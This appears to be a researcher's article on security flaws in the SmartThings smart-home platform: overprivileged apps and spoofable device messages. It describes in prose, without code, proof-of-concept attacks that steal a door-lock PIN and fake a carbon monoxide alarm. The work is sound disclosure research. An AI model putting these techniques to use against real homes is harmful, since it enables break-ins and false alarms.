Smart homes, an aspect of the Internet of Things, offer the promise of improved energy efficiency and control over home security. Integrating various devices together can offer users easy programming of many devices around the home, including appliances, cameras and alarm sensors. Several systems can handle this type of task, such as Samsung SmartThings, Google Brillo/Weave, Apple HomeKit, Allseen Alljoyn and Amazon Alexa.
But there are also security risks. Smart home systems can leave owners vulnerable to serious threats, such as arson, blackmail, theft and extortion. Current security research has focused on individual devices, and how they communicate with each other. For example, the MyQ garage system can be turned into a surveillance tool, alerting would-be thieves when a garage door opened and then closed, and allowing them to remotely open it again after the residents had left. The popular ZigBee communication protocol can allow attackers to join the secure home network.
Little research has focused on what happens when these devices are integrated into a coordinated system. We set out to determine exactly what these risks might be, in the hope of showing platform designers areas in which they should improve their software to better protect users’ security in future smart home systems.
Evaluating the security of smart home platforms
First, we surveyed most of the above platforms to understand the landscape of smart home programming frameworks. We looked at what systems existed, and what features they offered. We also looked at what devices they could interact with, whether they supported third-party apps, and how many apps were in their app stores. And, importantly, we looked at their security features.
We decided to focus deeper inquiry on SmartThings because it is a relatively mature system, with 521 apps in its app store, supporting 132 types of IoT devices for the home. In addition, SmartThings has a number of conceptual similarities to other, newer systems that make our insights potentially relevant more broadly. For example, SmartThings and other systems offer trigger-action programming, which lets you connect sensors and events to automate aspects of your home. That is the sort of capability that can turn your walkway lights on when a driveway motion detector senses a car driving up, or can make sure your garage door is closed when you turn your bedroom light out at night.
We tested for potential security holes in the system and 499 SmartThings apps (also called SmartApps) from the SmartThings app store, seeking to understand how prevalent these security flaws were.
Finding and attacking main weaknesses
We found two major categories of vulnerability: excessive privileges and insecure messaging.
Overprivileged SmartApps: SmartApps have privileges to perform specific operations on a device, such as turning an oven on and off or locking and unlocking a door. This idea is similar to smartphone apps asking for different permissions, such as to use the camera or get the phone’s current location. These privileges are grouped together; rather than getting separate permission for locking a door and unlocking it, an app would be allowed to do both – even if it didn’t need to.
For example, imagine an app that can automatically lock a specific door after 9 p.m. The SmartThings system would also grant that app the ability to unlock the door. An app’s developer cannot ask only for permission to lock the door.
[bctt tweet=”More than half – 55 percent – of 499 SmartApps we studied had access to more functions than they needed.” via=”no”]
Insecure messaging system: SmartApps can communicate with physical devices by exchanging messages, which can be envisioned as analogous to instant messages exchanged between people. SmartThings devices send messages that can contain sensitive data, such as a PIN code to open a particular lock.
We found that as long as a SmartApp has even the most basic level of access to a device (such as permission to show how much battery life is left), it can receive all the messages the physical device generates – not just those messages about functions it has privileges to. So an app intended only to read a door lock’s battery level could also listen to messages that contain a door lock’s PIN code.
In addition, we found that SmartApps can “impersonate” smart-home equipment, sending out their own messages that look like messages generated by real physical devices. The malicious SmartApp can read the network’s ID for the physical device, and create a message with that stolen ID. That battery-level app could even covertly send a message as if it were the door lock, falsely reporting it had been opened, for example.
SmartThings does not ensure that only physical devices can create messages with a certain ID.
Attacking the design flaws
To move beyond the potential weaknesses into actual security breaches, we built four proof-of-concept attacks to demonstrate how attackers can combine and exploit the design flaws we found in SmartThings.
In our first attack, we built an app that promised to monitor the battery levels of various wireless devices around the home, such as motion sensors, leak detectors, and door locks. However, once installed by an unsuspecting user, this seemingly benign app was programmed to snoop on the other messages sent by those devices, opening a key vulnerability.
When the authorized user creates a new PIN code for a door lock, the lock itself will acknowledge the changed code by sending a confirmation message to the network. That message contains the new code, which could then be read by the malicious battery-monitoring app. The app can then send the code to its designer by SMS text message – effectively sending a house key directly to a prospective intruder.
In our second attack, we were able to snoop on the supposedly secure communications between a SmartApp and its companion Android mobile app. This allowed us to impersonate the Android app and send commands to the SmartApp – such as to create a new PIN code that would let us into the home.
Our third and fourth attacks involved writing malicious SmartApps that were able to take advantage of other security flaws. One custom SmartApp could disable “vacation mode,” a popular occupancy-simulation feature; we stopped a smart home system from turning lights on and off and otherwise behaving as if the home were occupied. Another custom SmartApp was able to falsely trigger a fire alarm by pretending to be a carbon monoxide sensor.
Room for improvement
Taking a step back, what does this mean for smart homes in general? Are these results indicative of the industry as a whole? Can smart homes ever be safe?
There are great benefits to gain from smart homes, and the Internet of Things in general, that ultimately lead to an improved quality of living. However, given the security weaknesses in today’s systems, caution is appropriate.
These are new technologies in nascent stages, and users should think about whether they are comfortable with giving third parties (e.g., apps or smart home platforms) remote access to their devices. For example, personally, I wouldn’t mind giving smart home technologies remote access to my window shades or desk lamps. But I would be wary of staking my safety on remotely controlled door locks, fire alarms, and ovens, as these are security- and safety-critical devices. If misused, those systems could allow – or even cause – physical harm.
However, I might change that assessment if systems were better designed to reduce the risks of failure or compromise, and to better protect users’ security.
Acknowledgements: This research is the result of a collaboration with Jaeyeon Jung and Atul Prakash.